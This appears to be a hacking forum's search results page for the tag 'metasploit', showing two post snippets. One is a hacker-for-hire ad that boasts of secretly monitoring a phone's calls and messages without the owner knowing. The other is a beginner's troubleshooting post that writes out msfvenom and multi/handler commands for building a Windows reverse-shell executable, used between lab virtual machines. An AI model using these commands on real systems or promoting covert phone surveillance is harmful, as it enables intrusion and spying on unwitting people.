Search the Community

Showing results for tags 'metasploit'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • General
    • General.Rules, Guidelines and Announcements
    • Nubie HQ
    • General Hacking
    • Old Skool Phreaking
    • LinkZ
    • Hacker Media
    • Hacker Meetings
    • Programming/Code
    • HAM Radio/Hardware Hacking
    • Retail Hacking
    • Urban Exploration And Social Engineering
    • *NIX
    • Graphic Designs
  • BinRev members section
    • Assorted Projects
  • Off-Topic
    • General Chat
    • Scratchytcarrier's Joke-A-Thon


  • Community Calendar


  • StankDawg: Howling@the.moon
  • Brokennode
  • RedAnthrax the BLOG!!!
  • CETX_var_log
  • The Hillbilly Hacker
  • Exit Status One
  • Bit Bucket
  • 1337_snic's Blog
  • Kotrin's Blog
  • LibbsSecurity E|Hacker Network Security Blog
  • R4p1d's Blog
  • Ohm's Blog
  • Letting the smoke out
  • 1337_snic's Blog
  • 1337_snic's Blog
  • jeremy_.html
  • tekio's blog
  • lattera's Blog
  • The Microwave Rider


  • Audio
    • Internet Radio shows
    • Miscellaneous
  • Zines
    • Phrack
    • BR Magazine
    • PoC||GTFO
  • Video
    • HackTV

Found 2 results

  1. Are you looking to hire a commendable hacker ?: then you should check this out I got full access to the phone... monitoring from another device (my computer) i recorded calls and sent messages fron the device without thwe owner knowing. It was an amazing!.
  2. This is my first reverse shell. I used msfvenom -p windows/shell/reverse_tcp LHOST=mykalivmip LPORT=4444 -f exe > evil.exe I copy the evil.exe file over to windows 7 vm. Then I go back to metasploit and type use exploit/multi/handler set payload windows/shell/reverse_tcp set lport 4444 set lhost mykalivmip exploit set lhost mykalivmip exploit I also tried set END SESSION ON START=false right before exploit and that didn' work either. I am using VirtualBox version 5.0.20 kalivm 32bit and windowsvm 32bit with host ubunutu. I also tried a similiar windows meterpreter reverse tcp and get the same thing. This is what shows after exploit I also double click the evil.exe file in windows after exploit and get this [*] Started reverse TCP handler on mykalivmip:4444 [*] Starting the payload handler... It just gets stuck on this.